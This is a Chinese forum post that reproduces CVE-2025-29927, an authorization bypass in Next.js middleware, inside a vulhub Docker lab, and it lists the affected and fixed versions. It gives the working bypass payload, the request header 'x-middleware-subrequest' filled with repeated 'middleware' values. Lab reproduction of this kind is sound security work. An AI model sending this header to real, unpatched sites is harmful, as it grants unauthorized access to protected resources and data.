论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
IT评测·应用市场-qidao123.com
»
论坛
›
安全
›
网络安全
›
CVE-2025-29927 Next.js 中间件权限绕过毛病复现 ...
CVE-2025-29927 Next.js 中间件权限绕过毛病复现
种地
论坛元老
|
2025-3-24 12:36:48
|
显示全部楼层
|
阅读模式
楼主
主题
1047
|
帖子
1047
|
积分
3141
免责声明
本文所述毛病复现方法仅供安全研究及授权测试使用;任何个人/组织须在合法合规条件下实施,严禁用于非法目的。作者不对任何滥用行为及结果负责,如发现新毛病请及时联系厂商并遵照毛病披露规则。
毛病信息
Next.js 是一个基于 React 的流行 Web 应用框架,提供服务器端渲染、静态网站天生和集成路由体系等功能。包含众多功能,是深入研究复杂研究的完美游乐场。在信念、好奇心和韧性的推动下,我们出发去探索它鲜为人知的方面,寻找等候被发现的隐藏宝藏。
当使用中间件进行身份验证和授权时,Next.js 14.2.25 和 15.2.3 之前的版本存在授权绕过毛病。
该毛病答应攻击者通过操纵 x-middleware-subrequest 哀求头来绕过基于中间件的安全控制,从而可能获得对受保护资源和敏感数据的未授权访问。
补丁:
对于 Next.js 15.x,此问题已在 15.2.3 中修复
对于 Next.js 14.x,此问题已在 14.2.25 中修复
毛病复现
vulhub已有环境:
vulhub/next.js/CVE-2025-29927/README.zh-cn.md at master · vulhub/vulhub (github.com)
启动环境:
docker compose up -d
复制代码
访问虚拟机3000端口,可以看到环境搭建成功:
http://your-ip:3000/login
访问根路径,显示必要登岸:
添加哀求头,使用权限绕过payload
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
复制代码
访问成功,权限绕过毛病复现成功
参考文章
Next.js 和破坏的中间件:授权工件 - zhero_web_security (zhero-web-sec.github.io)
vulhub/next.js/CVE-2025-29927/README.zh-cn.md at master · vulhub/vulhub (github.com)
CVE 2025 29927 Nextjs Auth Bypass - chestnut's blog (ch35tnut.com)
Next.js中间件授权绕过毛病终极指南:CVE-2025-29927深度解析与防护计谋 - 高效码农 (xugj520.cn)
Comparing v15.2.2...v15.2.3 · vercel/next.js (github.com)
代码审计知识星球 (zsxq.com)
本文作者CVE-柠檬i
CSDN:
https://blog.csdn.net/weixin_49125123
博客园:
https://www.cnblogs.com/CVE-Lemon
微信公众号:Lemon安全
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
种地
论坛元老
这个人很懒什么都没写!
楼主热帖
Beta 阶段事后分析
mac下配置Charles,安装证书,连接iOS ...
为什么 SQL 语句使用了索引,但却还是 ...
图的基本术语,邻接矩阵、邻接表表示方 ...
python经典习题(一)
DOS窗口命令和单表简单查询
Archlinux scarlett solo driver insta ...
利用kubernetes中的leader选举机制来完 ...
Doris(五) -- 数据的导入导出
MySQL实战45讲 10
标签云
运维
CIO
存储
服务器
浏览过的版块
IT职场那些事
数据安全
Java
容器及微服务
边缘计算
快速回复
返回顶部
返回列表